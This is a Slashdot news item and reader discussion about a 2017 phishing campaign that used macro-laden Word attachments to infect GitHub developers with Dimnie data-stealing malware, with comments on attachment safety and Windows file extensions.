Follow Slashdot blog updates by subscribing to our blog RSS feed

 



Forgot your password?
typodupeerror
Security Crime

GitHub Repository Owners Targeted By Data-Stealing Malware (threatpost.com) 63

"Phishing emails zeroing in on developers who own Github repositories were infecting victims with malware capable of stealing data through keyloggers and modules that would snag screenshots," writes ThreatPost. An anonymous reader quotes their report: Researchers at Palo Alto Networks this week said that in mid-January, an unknown number of developers were targeted with emails purporting to be job offers. The attachments instead carried malicious .doc files containing an embedded macro. The macro executed a PowerShell command that would grab malware from a command and control site and execute it... [Senior threat researcher Brandon] Levene said it's unknown how widespread the January campaign was or why developers were targeted, but given the vast number of projects hosted on the platform, it would likely be an attractive target for either criminals and nation-state attackers.
Levene said the PowerShell script drops a binary named Dimnie, which has been around since 2014 but before January targeted primarily Russian-speaking targets. Someone who received two different emails said they appeared to be hand-crafted, according to Ars Technica, and referenced data changed that same day. They believe this suggests "a focused campaign explicitly targeting targets perceived as 'high return investments,' such as developers (possibly working on popular/open source projects)."
This discussion has been archived. No new comments can be posted.

GitHub Repository Owners Targeted By Data-Stealing Malware

Comments Filter:
  • The attachments instead carried malicious .doc files containing an embedded macro.

    I hope most devs know better than to open a .doc from some stranger on the internet.

    • by Blade ( 1720 )

      Hope away. I'm sure plenty haven't got a clue.

    • I think that it's insane that they have to know it. We are not afraid of opening .txt files, why should something more structured be that different?

      • by Anonymous Coward

        We are not afraid of opening .txt files

        We are not?

      • Re:Devs (Score:5, Insightful)

        by Anonymous Coward on Monday April 03, 2017 @06:48AM (#54163411)

        Many trojans were distributed as resume.txt.exe at one point, so you really did have to be afraid of opening ".txt" files since the Windows default at the time would hide the .exe... unless of course you were one of the people who understood the risk. Is this insane? Well yes... Microsoft should've never hid the extension by default. The fault is entirely theirs. Just like how the fault is entirely theirs that a .doc file has a built-in control language easily used to contain a malicious payload.

        Simple solution is not to use the programs that execute the malicious code while reading a document, but this falls under 'having to know it' and isn't a good solution for the commons.

        • by AmiMoJo ( 196126 )

          To be fair, most people don't understand file extensions and they are a shitty way of determining the content of the file. The problem is, Microsoft hid them and didn't replace them with anything better.

          I've had one of these phising emails just now. Had my correct name and address in it. I guess with all the data leakage such things are bound to get and be sold for pennies if you have ever bought anything online. I just wish I had started adding random letters to my address earlier so I could trace the sour

          • To be fair, most people don't understand file extensions

            There is no cure for stupid. I do agree with you that Microsoft has exacerbated it starting with Windows 95 by hiding the file system as much as possible, though.

            and they are a shitty way of determining the content of the file.

            Extensions are a great way to quickly denote the type of a file. They are portable across all file systems and platforms, short and recognizable by convention, and for the most common files generally unique enough. The fact that 'gif' and 'mp3' are commodity terms nowadays speaks to the power of file extensions.

            Don't get me wrong: I'm not saying th

      • by gatkinso ( 15975 )

        As a general rule: I don't open stuff from email, regardless of who sent it.

        • But do you open stuff you get somewhere else ? e-mail is just a medium.

        • Re: (Score:2, Insightful)

          by Anonymous Coward

          As a general rule: I don't open stuff from email, regardless of who sent it.

          Yes, that's because you don't have a job.

          Those of us with actual paying jobs don't have the luxury of not opening e-mail attachments.

          • by AHuxley ( 892839 )
            Well AC how far up a different network can an attachment be looked at without the infection spreading?
            Perhaps consider any attachments on a safer computer and see whats in the file before it gets to a computer/network thats vital?
            Lots of strange OS exist, lots of different file systems. Some of them should be able to network and display an attachment.
        • If I have to open an attachment, it goes in a VM with no virtual adapters. If it is a Trojan and craps all over the VM, oh well. I just roll back the snapshot.

      • Re:Devs (Score:5, Insightful)

        by fuzzyfuzzyfungus ( 1223518 ) on Monday April 03, 2017 @07:23AM (#54163503) Journal
        Because one aspect of the 'more structured' is a handy mechanism for executing code on your system if you open it. If text editors habitually executed any shell scripts included in .txt files; we'd be nervous about those as well. Greater complexity is hardly completely safe, since it makes implementation of software capable of opening the file more complex; but that's a comparatively minor difference of degree compared to the difference between files types where automatic execution is a feature and ones where it's a bug.
  • by Gravis Zero ( 934156 ) on Monday April 03, 2017 @07:49AM (#54163585)

    If you're still using Windows after everything Microsoft has done, you clearly like the abuse, so this is just one more thing for you suffer through.

    • by doom ( 14564 )
      es, that's what I was thinking: these are carefully crafted attacks against high-value targets... who are still using Microsoft products?
  • From the link in the article [hackademix.net]:

    From: zayavka@bsme-mos.ru
    Subject: question
    Hey. I found your software is online. Can you write the code for my project? Terms of reference attached below. The price shall discuss, if you can make. Answer please.

    Sorry, that doesn't pass the smell test. It reeks like a phishing attempt. 1) Unsolicited e-mail. 2) Broken English. 3)Request to open attachment. 4)Vague subject. 5) Sketchy e-mail address.

    Zero sympathy for people who fell for this. Nerds should know better.

  • Windows Based GitHub Repository Owners Targeted By Data-Stealing Malware -
    Here, I fixed the title for you.

  • "Phishing emails zeroing in on developers who own Github repositories were infecting victims with malware capable of stealing data through keyloggers and modules that would snag screenshots,"
  • What about LibreOffice? Does it run code in document files/allow them access to the system?

  • Set-ExecutionPolicy AllSigned

If I have not seen as far as others, it is because giants were standing on my shoulders. -- Hal Abelson

Working...